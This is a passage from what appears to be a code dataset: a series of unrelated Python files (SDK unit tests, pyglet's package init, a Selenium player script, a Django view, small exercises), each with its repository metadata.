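# Illustrative use of the decorator above (it is defined but never applied in the
# original script); decorating crawler() would report its total run time:
#   @statistic_time
#   def crawler():
#       ...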
if __name__ == '__main__':
conn = crawler() | 28.314815 | 124 | 0.642904 |
53463d11d35c410f6ad13ce3ecd8c4df4070c00a | 228 | py | Python | Exercicios/exe003.py | EmersonLCruz/Python | a2f2bfdbdcce33ac5f8473b6438a04f9dbd8ce1e | [
"MIT"
] | null | null | null | Exercicios/exe003.py | EmersonLCruz/Python | a2f2bfdbdcce33ac5f8473b6438a04f9dbd8ce1e | [
"MIT"
] | null | null | null | Exercicios/exe003.py | EmersonLCruz/Python | a2f2bfdbdcce33ac5f8473b6438a04f9dbd8ce1e | [
"MIT"
] | null | null | null | # Crie um programa que leia dois números e mostre a soma entre eles.
n1 = int(input('Digite Primeiro Valor:'))
n2 = int(input('Digite Segundo Valor:'))
soma = n1 + n2
print('A soma entre {} e {} é igual a {}'.format(n1,n2,soma)) | 45.6 | 68 | 0.679825 |
3b5228e6bdb739d6fdc649837c0fd893bda9ca92 | 105 | py | Python | secrets.template.py | basilleaf/curated_retweet_bot | fb028b04c7ead353e820dad332e95e81c5e91376 | [
"MIT"
] | null | null | null | secrets.template.py | basilleaf/curated_retweet_bot | fb028b04c7ead353e820dad332e95e81c5e91376 | [
"MIT"
] | 2 | 2015-08-05T20:32:58.000Z | 2016-11-18T21:59:31.000Z | secrets.template.py | basilleaf/fav_retweet_bot | fb028b04c7ead353e820dad332e95e81c5e91376 | [
"MIT"
] | null | null | null | # twitter auth creds
consumer_key = ''
consumer_secret = ''
access_token = ''
access_token_secret = ''
| 17.5 | 24 | 0.704762 |
4c2e61e636efee10e089ef1962ecd5aad481cba2 | 7,729 | py | Python | tests/unit/test_default_connection.py | festicket/connect-sdk-python3 | c399c6443789dd978f319c89e1ebd387c812a77b | [
"MIT"
] | 12 | 2016-09-26T21:46:31.000Z | 2020-12-23T18:44:54.000Z | tests/unit/test_default_connection.py | festicket/connect-sdk-python3 | c399c6443789dd978f319c89e1ebd387c812a77b | [
"MIT"
] | 3 | 2020-05-02T16:53:02.000Z | 2020-06-02T12:49:51.000Z | tests/unit/test_default_connection.py | festicket/connect-sdk-python3 | c399c6443789dd978f319c89e1ebd387c812a77b | [
"MIT"
] | 11 | 2017-07-16T00:55:28.000Z | 2021-09-24T17:00:49.000Z | import unittest
import warnings
from ingenico.connect.sdk.communicator_configuration import CommunicatorConfiguration
from ingenico.connect.sdk.log.response_log_message import ResponseLogMessage
from ingenico.connect.sdk.log.sys_out_communicator_logger import SysOutCommunicatorLogger
from ingenico.connect.sdk.defaultimpl.default_connection import DefaultConnection
from ingenico.connect.sdk.proxy_configuration import ProxyConfiguration
CONNECT_TIMEOUT = 10
SOCKET_TIMEOUT = 20
MAX_CONNECTIONS = 100
# noinspection PyTypeChecker
class DefaultConnectionTest(unittest.TestCase):
"""Tests that a DefaultConnection can be constructed with a multitude of settings"""
def test_log_unicode_2(self):
"""Tests if requests can be logged correctly"""
logger = SysOutCommunicatorLogger()
message = ResponseLogMessage(request_id="aaa",
status_code=2345,
duration=45.32)
body = u"Schr\xf6der"
content = "JSON"
message.set_body(body, content)
logger.log_response(message)
def test_log_unicode(self):
"""Tests if requests can be logged correctly"""
logger = SysOutCommunicatorLogger()
message = ResponseLogMessage(request_id="aaa",
status_code=2345,
duration=45.32)
body = u"Schr\u0e23\u0e16der"
content = "JSON"
message.set_body(body, content)
logger.log_response(message)
def test_construct_without_proxy(self):
"""Tests construction of a DefaultConnection without using a proxy"""
connection = DefaultConnection(CONNECT_TIMEOUT, SOCKET_TIMEOUT)
self.assertTimeouts(self, connection, CONNECT_TIMEOUT, SOCKET_TIMEOUT)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertMaxConnections(self, connection, CommunicatorConfiguration.DEFAULT_MAX_CONNECTIONS, None)
self.assertNoProxy(self, connection)
def test_construct_with_proxy_without_authentication(self):
"""Tests construction of a DefaultConnection with an unauthenticated proxy"""
proxy_config = ProxyConfiguration.from_uri("http://test-proxy")
connection = DefaultConnection(CONNECT_TIMEOUT, SOCKET_TIMEOUT, proxy_configuration=proxy_config)
self.assertTimeouts(self, connection, CONNECT_TIMEOUT, SOCKET_TIMEOUT)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertMaxConnections(self, connection,
CommunicatorConfiguration.DEFAULT_MAX_CONNECTIONS, proxy_config)
self.assertProxy(self, connection, proxy_config)
def test_construct_with_proxy_with_authentication(self):
"""Tests construction of a DefaultConnection with an authenticated proxy"""
proxy_config = ProxyConfiguration.from_uri("http://test-proxy", "test-username", "test-password")
connection = DefaultConnection(CONNECT_TIMEOUT, SOCKET_TIMEOUT, proxy_configuration=proxy_config)
self.assertTimeouts(self, connection, CONNECT_TIMEOUT, SOCKET_TIMEOUT)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertMaxConnections(self, connection,
CommunicatorConfiguration.DEFAULT_MAX_CONNECTIONS, proxy_config)
self.assertProxy(self, connection, proxy_config)
def test_construct_with_max_connections_without_proxy(self):
"""Tests construction of a DefaultConnection with a different amount of max connections and no proxy"""
connection = DefaultConnection(CONNECT_TIMEOUT, SOCKET_TIMEOUT, MAX_CONNECTIONS)
self.assertTimeouts(self, connection, CONNECT_TIMEOUT, SOCKET_TIMEOUT)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertMaxConnections(self, connection, MAX_CONNECTIONS, None)
self.assertNoProxy(self, connection)
def test_construct_with_max_connections_with_proxy(self):
"""Tests construction of a DefaultConnection
with a different amount of max connections and an unauthenticated proxy
"""
proxy_config = ProxyConfiguration.from_uri("http://test-proxy")
connection = DefaultConnection(CONNECT_TIMEOUT, SOCKET_TIMEOUT,
MAX_CONNECTIONS, proxy_configuration=proxy_config)
self.assertTimeouts(self, connection, CONNECT_TIMEOUT, SOCKET_TIMEOUT)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertMaxConnections(self, connection, MAX_CONNECTIONS, proxy_config)
self.assertProxy(self, connection, proxy_config)
@staticmethod
def assertNoProxy(test_instance, default_connection):
"""Asserts that the default_connection does not have any proxy settings contained within"""
test_instance.assertFalse(default_connection._DefaultConnection__requests_session.proxies)
@staticmethod
def assertProxy(test_instance, connection, proxy_configuration):
"""Asserts that the proxy data inside the connection is consistent with the data in proxy_configuration"""
test_instance.assertIn(str(proxy_configuration),
list(connection._DefaultConnection__requests_session.proxies.values()))
@staticmethod
def assertConnection(test_instance, default_connection, connect_timeout, socket_timeout,
max_connections, proxy_configuration=None):
"""Asserts that the default_connection parameter has properties conform
the connect_timeout, the socket_timeout, max_connections and the proxy_configuration
"""
DefaultConnectionTest.assertTimeouts(test_instance, default_connection, connect_timeout, socket_timeout)
DefaultConnectionTest.assertMaxConnections(test_instance, default_connection, max_connections,
proxy_configuration)
if proxy_configuration is not None:
DefaultConnectionTest.assertProxy(test_instance, default_connection, proxy_configuration)
else:
DefaultConnectionTest.assertNoProxy(test_instance, default_connection)
@staticmethod
def assertTimeouts(test_instance, connection, connection_timeout, socket_timeout):
"""Asserts that the settings in the request config of the connection have the proper timeout settings"""
test_instance.assertEqual(connection_timeout, connection.connect_timeout)
test_instance.assertEqual(socket_timeout, connection.socket_timeout)
@staticmethod
def assertMaxConnections(test_instance, connection, max_connections, proxy_configuration):
"""Asserts that the connection has the correct setting for max_connections and proxy_configuration"""
requests_session = connection._DefaultConnection__requests_session
try:
http_poolsize = requests_session.get_adapter("http://")._pool_maxsize
https_poolsize = requests_session.get_adapter("https://")._pool_maxsize
test_instance.assertEqual(http_poolsize,
https_poolsize) # requests stores its poolsize as a per-host variable
except Exception as e:
if isinstance(e, AssertionError):
raise e
else:
print("Could not access max_connections attribute in libary for validation")
# proxy settings are deeply embedded in requests, we don't check them here
if __name__ == '__main__':
unittest.main()
| 50.51634 | 114 | 0.709018 |
ce66a754b61765ee75423b8d3fce7da4505ffbbd | 14,373 | py | Python | pyglet/__init__.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
] | null | null | null | pyglet/__init__.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
] | null | null | null | pyglet/__init__.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
] | null | null | null | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''pyglet is a cross-platform games and multimedia package.
Detailed documentation is available at http://www.pyglet.org
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import os
import sys
_is_epydoc = hasattr(sys, 'is_epydoc') and sys.is_epydoc
#: The release version of this pyglet installation.
#:
#: Valid only if pyglet was installed from a source or binary distribution
#: (i.e. not in a checked-out copy from SVN).
#:
#: Use setuptools if you need to check for a specific release version, e.g.::
#:
#: >>> import pyglet
#: >>> from pkg_resources import parse_version
#: >>> parse_version(pyglet.version) >= parse_version('1.1')
#: True
#:
version = '1.2.1'
# Pyglet platform treats *BSD systems as Linux
compat_platform = sys.platform
if "bsd" in compat_platform:
compat_platform = "linux-compat"
def _require_ctypes_version(version):
# Check ctypes version
import ctypes
req = [int(i) for i in version.split('.')]
have = [int(i) for i in ctypes.__version__.split('.')]
if not tuple(have) >= tuple(req):
raise ImportError('pyglet requires ctypes %s or later.' % version)
_require_ctypes_version('1.0.0')
_enable_optimisations = not __debug__
if getattr(sys, 'frozen', None):
_enable_optimisations = True
#: Global dict of pyglet options. To change an option from its default, you
#: must import ``pyglet`` before any sub-packages. For example::
#:
#: import pyglet
#: pyglet.options['debug_gl'] = False
#:
#: The default options can be overridden from the OS environment. The
#: corresponding environment variable for each option key is prefaced by
#: ``PYGLET_``. For example, in Bash you can set the ``debug_gl`` option with::
#:
#: PYGLET_DEBUG_GL=True; export PYGLET_DEBUG_GL
#:
#: For options requiring a tuple of values, separate each value with a comma.
#:
#: The non-development options are:
#:
#: audio
#: A sequence of the names of audio modules to attempt to load, in
#: order of preference. Valid driver names are:
#:
#: * directsound, the Windows DirectSound audio module (Windows only)
#: * pulse, the PulseAudio module (Linux only)
#: * openal, the OpenAL audio module
#: * silent, no audio
#: debug_lib
#: If True, prints the path of each dynamic library loaded.
#: debug_gl
#: If True, all calls to OpenGL functions are checked afterwards for
#: errors using ``glGetError``. This will severely impact performance,
#: but provides useful exceptions at the point of failure. By default,
#: this option is enabled if ``__debug__`` is (i.e., if Python was not run
#: with the -O option). It is disabled by default when pyglet is "frozen"
#: within a py2exe or py2app library archive.
#: shadow_window
#: By default, pyglet creates a hidden window with a GL context when
#: pyglet.gl is imported. This allows resources to be loaded before
#: the application window is created, and permits GL objects to be
#: shared between windows even after they've been closed. You can
#: disable the creation of the shadow window by setting this option to
#: False.
#:
#: Some OpenGL driver implementations may not support shared OpenGL
#: contexts and may require disabling the shadow window (and all resources
#: must be loaded after the window using them was created). Recommended
#: for advanced developers only.
#:
#: **Since:** pyglet 1.1
#: vsync
#: If set, the `pyglet.window.Window.vsync` property is ignored, and
#: this option overrides it (to either force vsync on or off). If unset,
#: or set to None, the `pyglet.window.Window.vsync` property behaves
#: as documented.
#: xsync
#: If set (the default), pyglet will attempt to synchronise the drawing of
#: double-buffered windows to the border updates of the X11 window
#: manager. This improves the appearance of the window during resize
#: operations. This option only affects double-buffered windows on
#: X11 servers supporting the Xsync extension with a window manager
#: that implements the _NET_WM_SYNC_REQUEST protocol.
#:
#: **Since:** pyglet 1.1
#: darwin_cocoa
#: If True, the Cocoa-based pyglet implementation is used as opposed to
#: the 32-bit Carbon implementation. When python is running in 64-bit mode
#: on Mac OS X 10.6 or later, this option is set to True by default.
#: Otherwise the Carbon implementation is preferred.
#:
#: **Since:** pyglet 1.2
#:
#: search_local_libs
#: If False, pyglet won't try to search for libraries in the script
#: directory and its `lib` subdirectory. This is useful to load a local
#: library instead of the system installed version. This option is set
#: to True by default.
#:
#: **Since:** pyglet 1.2
#:
options = {
'audio': ('directsound', 'pulse', 'openal', 'silent'),
'font': ('gdiplus', 'win32'), # ignored outside win32; win32 is deprecated
'debug_font': False,
'debug_gl': not _enable_optimisations,
'debug_gl_trace': False,
'debug_gl_trace_args': False,
'debug_graphics_batch': False,
'debug_lib': False,
'debug_media': False,
'debug_texture': False,
'debug_trace': False,
'debug_trace_args': False,
'debug_trace_depth': 1,
'debug_trace_flush': True,
'debug_win32': False,
'debug_x11': False,
'graphics_vbo': True,
'shadow_window': True,
'vsync': None,
'xsync': True,
'xlib_fullscreen_override_redirect': False,
'darwin_cocoa': False,
'search_local_libs': True,
}
_option_types = {
'audio': tuple,
'font': tuple,
'debug_font': bool,
'debug_gl': bool,
'debug_gl_trace': bool,
'debug_gl_trace_args': bool,
'debug_graphics_batch': bool,
'debug_lib': bool,
'debug_media': bool,
'debug_texture': bool,
'debug_trace': bool,
'debug_trace_args': bool,
'debug_trace_depth': int,
'debug_trace_flush': bool,
'debug_win32': bool,
'debug_x11': bool,
'graphics_vbo': bool,
'shadow_window': bool,
'vsync': bool,
'xsync': bool,
'xlib_fullscreen_override_redirect': bool,
'darwin_cocoa': bool,
}
def _choose_darwin_platform():
"""Choose between Darwin's Carbon and Cocoa implementations."""
if compat_platform != 'darwin':
return
import struct
numbits = 8*struct.calcsize("P")
if numbits == 64:
import platform
osx_version = platform.mac_ver()[0].split(".")
if int(osx_version[0]) == 10 and int(osx_version[1]) < 6:
raise Exception('pyglet is not compatible with 64-bit Python for versions of Mac OS X prior to 10.6.')
options['darwin_cocoa'] = True
else:
options['darwin_cocoa'] = False
_choose_darwin_platform() # can be overridden by an environment variable below
def _read_environment():
'''Read defaults for options from environment'''
for key in options:
env = 'PYGLET_%s' % key.upper()
try:
value = os.environ[env]
if _option_types[key] is tuple:
options[key] = value.split(',')
elif _option_types[key] is bool:
options[key] = value in ('true', 'TRUE', 'True', '1')
elif _option_types[key] is int:
options[key] = int(value)
except KeyError:
pass
_read_environment()
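# Illustrative effect of the environment overrides above (assumed shell values):
#   PYGLET_AUDIO=openal,silent   -> options['audio'] = ['openal', 'silent']
#   PYGLET_DEBUG_GL=1            -> options['debug_gl'] = True
#   PYGLET_DEBUG_TRACE_DEPTH=3   -> options['debug_trace_depth'] = 3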
if compat_platform == 'cygwin':
# This hack pretends that the posix-like ctypes provides windows
# functionality. COM does not work with this hack, so there is no
# DirectSound support.
import ctypes
ctypes.windll = ctypes.cdll
ctypes.oledll = ctypes.cdll
ctypes.WINFUNCTYPE = ctypes.CFUNCTYPE
ctypes.HRESULT = ctypes.c_long
# Call tracing
# ------------
_trace_filename_abbreviations = {}
def _trace_repr(value, size=40):
value = repr(value)
if len(value) > size:
value = value[:size//2-2] + '...' + value[-size//2-1:]
return value
def _trace_frame(thread, frame, indent):
from pyglet import lib
if frame.f_code is lib._TraceFunction.__call__.func_code:
is_ctypes = True
func = frame.f_locals['self']._func
name = func.__name__
location = '[ctypes]'
else:
is_ctypes = False
code = frame.f_code
name = code.co_name
path = code.co_filename
line = code.co_firstlineno
try:
filename = _trace_filename_abbreviations[path]
except KeyError:
# Trim path down
dir = ''
path, filename = os.path.split(path)
while len(dir + filename) < 30:
filename = os.path.join(dir, filename)
path, dir = os.path.split(path)
if not dir:
filename = os.path.join('', filename)
break
else:
filename = os.path.join('...', filename)
_trace_filename_abbreviations[path] = filename
location = '(%s:%d)' % (filename, line)
if indent:
name = 'Called from %s' % name
print '[%d] %s%s %s' % (thread, indent, name, location)
if _trace_args:
if is_ctypes:
args = [_trace_repr(arg) for arg in frame.f_locals['args']]
print ' %sargs=(%s)' % (indent, ', '.join(args))
else:
for argname in code.co_varnames[:code.co_argcount]:
try:
argvalue = _trace_repr(frame.f_locals[argname])
print ' %s%s=%s' % (indent, argname, argvalue)
except:
pass
if _trace_flush:
sys.stdout.flush()
def _thread_trace_func(thread):
def _trace_func(frame, event, arg):
if event == 'call':
indent = ''
for i in range(_trace_depth):
_trace_frame(thread, frame, indent)
indent += ' '
frame = frame.f_back
if not frame:
break
elif event == 'exception':
(exception, value, traceback) = arg
print 'First chance exception raised:', repr(exception)
return _trace_func
def _install_trace():
global _trace_thread_count
sys.setprofile(_thread_trace_func(_trace_thread_count))
_trace_thread_count += 1
_trace_thread_count = 0
_trace_args = options['debug_trace_args']
_trace_depth = options['debug_trace_depth']
_trace_flush = options['debug_trace_flush']
if options['debug_trace']:
_install_trace()
# Lazy loading
# ------------
class _ModuleProxy(object):
_module = None
def __init__(self, name):
self.__dict__['_module_name'] = name
def __getattr__(self, name):
try:
return getattr(self._module, name)
except AttributeError:
if self._module is not None:
raise
import_name = 'pyglet.%s' % self._module_name
__import__(import_name)
module = sys.modules[import_name]
object.__setattr__(self, '_module', module)
globals()[self._module_name] = module
return getattr(module, name)
def __setattr__(self, name, value):
try:
setattr(self._module, name, value)
except AttributeError:
if self._module is not None:
raise
import_name = 'pyglet.%s' % self._module_name
__import__(import_name)
module = sys.modules[import_name]
object.__setattr__(self, '_module', module)
globals()[self._module_name] = module
setattr(module, name, value)
if True:
app = _ModuleProxy('app')
canvas = _ModuleProxy('canvas')
clock = _ModuleProxy('clock')
com = _ModuleProxy('com')
event = _ModuleProxy('event')
font = _ModuleProxy('font')
gl = _ModuleProxy('gl')
graphics = _ModuleProxy('graphics')
image = _ModuleProxy('image')
input = _ModuleProxy('input')
lib = _ModuleProxy('lib')
media = _ModuleProxy('media')
resource = _ModuleProxy('resource')
sprite = _ModuleProxy('sprite')
text = _ModuleProxy('text')
window = _ModuleProxy('window')
# Fool py2exe, py2app into including all top-level modules (doesn't understand
# lazy loading)
if False:
import app
import canvas
import clock
import com
import event
import font
import gl
import graphics
import input
import image
import lib
import media
import resource
import sprite
import text
import window
# Hack around some epydoc bug that causes it to think pyglet.window is None.
if False:
import window
| 34.385167 | 114 | 0.644542 |
c733d05361a02b979e1b0d9c33d099077d656562 | 2,370 | py | Python | selenium__examples/music_yandex_ru/set_progress_playing_track.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 117 | 2015-12-18T07:18:27.000Z | 2022-03-28T00:25:54.000Z | selenium__examples/music_yandex_ru/set_progress_playing_track.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 8 | 2018-10-03T09:38:46.000Z | 2021-12-13T19:51:09.000Z | selenium__examples/music_yandex_ru/set_progress_playing_track.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 28 | 2016-08-02T17:43:47.000Z | 2022-03-21T08:31:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import itertools
import time
import re
import sys
# pip install selenium
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException
sys.path.append('get_all_tracks_playlist')
from common import Track, get_track, seconds_to_str
from config import profile, url
from run_first_track import play_track
SEARCHING_TRACK = 'Шишки-телепаты'
driver = None
try:
# Mute
profile.set_preference("media.volume_scale", "0.0")
driver = webdriver.Firefox(profile)
driver.implicitly_wait(2)
driver.get(url)
print(f'Title: {driver.title!r}')
time.sleep(2)
play_track(driver, SEARCHING_TRACK)
player_progress_el = driver.find_element_by_css_selector('.player-progress')
progress__line_el = player_progress_el.find_element_by_css_selector('.progress__bar.progress__progress > .progress__line')
progress_values = itertools.cycle([0, 10, 20, 35, 50, 75, 90, 100])
while True:
try:
track_playing_el = driver.find_element_by_css_selector('.d-track_playing')
track = get_track(track_playing_el)
except (NoSuchElementException, StaleElementReferenceException):
continue
progress_value = next(progress_values)
print(f'[#] Set progress value: {progress_value}')
offset_x = player_progress_el.size['width'] * (progress_value / 100)
offset_y = player_progress_el.size['height'] / 2
ActionChains(driver).move_to_element_with_offset(
player_progress_el, offset_x, offset_y
).click().perform()
total_seconds = track.get_seconds()
value = progress__line_el.get_attribute('style')
# Example: style="transform: scaleX(0.4728);"
m = re.search(r'scaleX\((.+?)\);', value)
if m:
progress_percent = float(m.group(1))
progress_left = total_seconds * progress_percent
progress_left_str = seconds_to_str(progress_left)
progress_right_str = seconds_to_str(total_seconds)
print(f'{track.title}. {progress_left_str} / {progress_right_str} ({progress_percent:.1%})')
time.sleep(1)
finally:
if driver:
driver.quit()
| 30.384615 | 126 | 0.698312 |
f8f6fb4f5174ea4f5e9c897312893c77de18de33 | 358 | py | Python | app/gwells/views/APIViews.py | cvarjao/gwells | cb47ec1d0c31b6f1586843e491f7cb5f1b98d61a | [
"Apache-2.0"
] | 1 | 2020-01-29T22:42:40.000Z | 2020-01-29T22:42:40.000Z | app/gwells/views/APIViews.py | matthewhall78/gwells | cb47ec1d0c31b6f1586843e491f7cb5f1b98d61a | [
"Apache-2.0"
] | 1 | 2018-05-02T05:28:33.000Z | 2018-05-09T15:58:07.000Z | app/gwells/views/APIViews.py | matthewhall78/gwells | cb47ec1d0c31b6f1586843e491f7cb5f1b98d61a | [
"Apache-2.0"
] | 1 | 2018-05-02T23:56:48.000Z | 2018-05-02T23:56:48.000Z | from rest_framework.generics import ListAPIView
from gwells.serializers import SurveySerializer
from gwells.models.Survey import Survey
class SurveyListView(ListAPIView):
"""
get: returns a list of active surveys
"""
serializer_class = SurveySerializer
queryset = Survey.objects.filter(survey_enabled=True)
pagination_class = None
| 25.571429 | 57 | 0.773743 |
2496ca229c2c1a1f98abcabdae372cf83e34b455 | 508 | py | Python | slp/config/moviecorpus.py | manzar96/movie_corpus_chatbot | 59de55de261330ed87b652dac6f8e045bf4fffcf | [
"MIT"
] | null | null | null | slp/config/moviecorpus.py | manzar96/movie_corpus_chatbot | 59de55de261330ed87b652dac6f8e045bf4fffcf | [
"MIT"
] | 1 | 2020-12-05T22:57:13.000Z | 2020-12-05T22:57:13.000Z | slp/config/moviecorpus.py | manzar96/movie_corpus_chatbot | 59de55de261330ed87b652dac6f8e045bf4fffcf | [
"MIT"
] | null | null | null | from enum import Enum
MOVIECORPUS_URL = 'http://www.cs.cornell.edu/~cristian/data' \
'/cornell_movie_dialogs_corpus.zip'
class SPECIAL_TOKENS(Enum):
PAD = '[PAD]'
MASK = '[MASK]'
UNK = '[UNK]'
BOS = '[BOS]'
EOS = '[EOS]'
CLS = '[CLS]'
@classmethod
def has_token(cls, token):
return any(token == t.name or token == t.value
for t in cls)
@classmethod
def to_list(cls):
return list(map(lambda x: x.value, cls))
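# Illustrative usage of the helpers above (assumed):
#   SPECIAL_TOKENS.has_token('[PAD]')  -> True
#   SPECIAL_TOKENS.to_list()           -> ['[PAD]', '[MASK]', '[UNK]', '[BOS]', '[EOS]', '[CLS]']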
| 20.32 | 62 | 0.55315 |
ab28da2a5eaa377b2794e26a50717290ef685cc2 | 2,499 | py | Python | nanpack/tests/test_thirdpartyinstalls.py | vxsharma-14/DIFFUS | d70633890b8fb2e7b3dde918eb13b263f7a035ef | [
"MIT"
] | 14 | 2021-01-28T06:52:15.000Z | 2021-03-05T01:34:30.000Z | nanpack/tests/test_thirdpartyinstalls.py | vxsharma-14/DIFFUS | d70633890b8fb2e7b3dde918eb13b263f7a035ef | [
"MIT"
] | 2 | 2020-12-23T10:44:09.000Z | 2020-12-24T12:02:25.000Z | nanpack/tests/test_thirdpartyinstalls.py | vxsharma-14/DIFFUS | d70633890b8fb2e7b3dde918eb13b263f7a035ef | [
"MIT"
] | 2 | 2021-01-28T06:52:17.000Z | 2021-01-30T12:35:52.000Z | # ***********************************************************************
#
# FILE test_requiredinstalls.py
#
# AUTHOR Dr. Vishal Sharma
#
# VERSION 1.0.0-alpha4
#
# WEBSITE https://github.com/vxsharma-14/project-NAnPack
#
# NAnPack Learner's Edition is distributed under the MIT License.
#
# Copyright (c) 2020 Vishal Sharma
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# You should have received a copy of the MIT License along with
# NAnPack Learner's Edition.
#
# ***********************************************************************
def test_3rdpartypackage():
"""Test numpy and matplotlib installation."""
try:
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(0, 361, 10)
y = np.sin(x*3.14/180.0)
plt.plot(x, y)
plt.title("Plot of sin(theta)")
plt.xlabel("X")
plt.ylabel("sin(theta)")
plt.xlim(0, 360)
print("Close plot to continue testing.")
plt.show()
    except Exception as err:
        print("Numpy/matplotlib test could not complete: {}".format(err))
def test_mathpackage():
"""Test math package."""
import math
mp = round(math.pi, 2)
assert mp == 3.14
if __name__ == "__main__":
test_3rdpartypackage()
print("Numpy package test SUCCESS.")
print("Matplotlib package test SUCCESS.")
test_mathpackage()
print("Math package test SUCCESS.")
| 34.708333 | 76 | 0.618247 |
c834d9f137d41d2bb5017e67c608124d0d164ede | 1,341 | py | Python | Hard/Nth_Magical_Number.py | dianjiaogit/LeetCode_Python_solution | 390693c839d1be8802c21ea81062443b6d5ea36f | [
"MIT"
] | null | null | null | Hard/Nth_Magical_Number.py | dianjiaogit/LeetCode_Python_solution | 390693c839d1be8802c21ea81062443b6d5ea36f | [
"MIT"
] | null | null | null | Hard/Nth_Magical_Number.py | dianjiaogit/LeetCode_Python_solution | 390693c839d1be8802c21ea81062443b6d5ea36f | [
"MIT"
] | null | null | null | # A positive integer is magical if it is divisible by either A or B.
# Return the N-th magical number. Since the answer may be very large, return it modulo 10^9 + 7.
# Example 1:
# Input: N = 1, A = 2, B = 3
# Output: 2
# Example 2:
# Input: N = 4, A = 2, B = 3
# Output: 6
# Example 3:
# Input: N = 5, A = 2, B = 4
# Output: 10
# Example 4:
# Input: N = 3, A = 6, B = 4
# Output: 8
# Note:
# 1 <= N <= 10^9
# 2 <= A <= 40000
# 2 <= B <= 40000
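# A common alternative to the solution below (illustrative sketch, not part of the
# original): binary search on the answer with inclusion-exclusion, which needs only
# O(log(N * min(A, B))) steps instead of walking forward by the gcd.
def _gcd(a, b):
    # Euclid's algorithm
    while b:
        a, b = b, a % b
    return a
def nth_magical_number_binary_search(N, A, B):
    # count of magical numbers <= x is x // A + x // B - x // lcm(A, B)
    lcm = A * B // _gcd(A, B)
    lo, hi = 1, N * min(A, B)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid // A + mid // B - mid // lcm < N:
            lo = mid + 1
        else:
            hi = mid
    return lo % (10 ** 9 + 7)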
class Solution(object):
def nthMagicalNumber(self, N, A, B):
"""
:type N: int
:type A: int
:type B: int
:rtype: int
"""
x = A
y = B
if x > y:
greater = x
smaller = y
else:
greater = y
smaller = x
while(True):
if((greater % x == 0) and (greater % y == 0)):
lcm = greater
break
greater += 1
if A == B:
return (N * A) % (10 ** 9 + 7)
for i in range(1,smaller + 1):
if((x % i == 0) and (y % i == 0)):
hcf = i
n = int(N / 2) * min(A, B)
a = int(n / A) + int(n / B) - int(n / lcm)
while a < N:
n += hcf
if n % A == 0 or n % B == 0:
a += 1
return n % (10 ** 9 + 7) | 20.953125 | 97 | 0.40343 |
22b059b73632e420a59a4ba7590ab37dc527218a | 8,040 | py | Python | src/ar_main2.py | mtc-20/augmented-reality | f86c1df4d21b87c95fd294e4553db649ec0857a1 | [
"MIT"
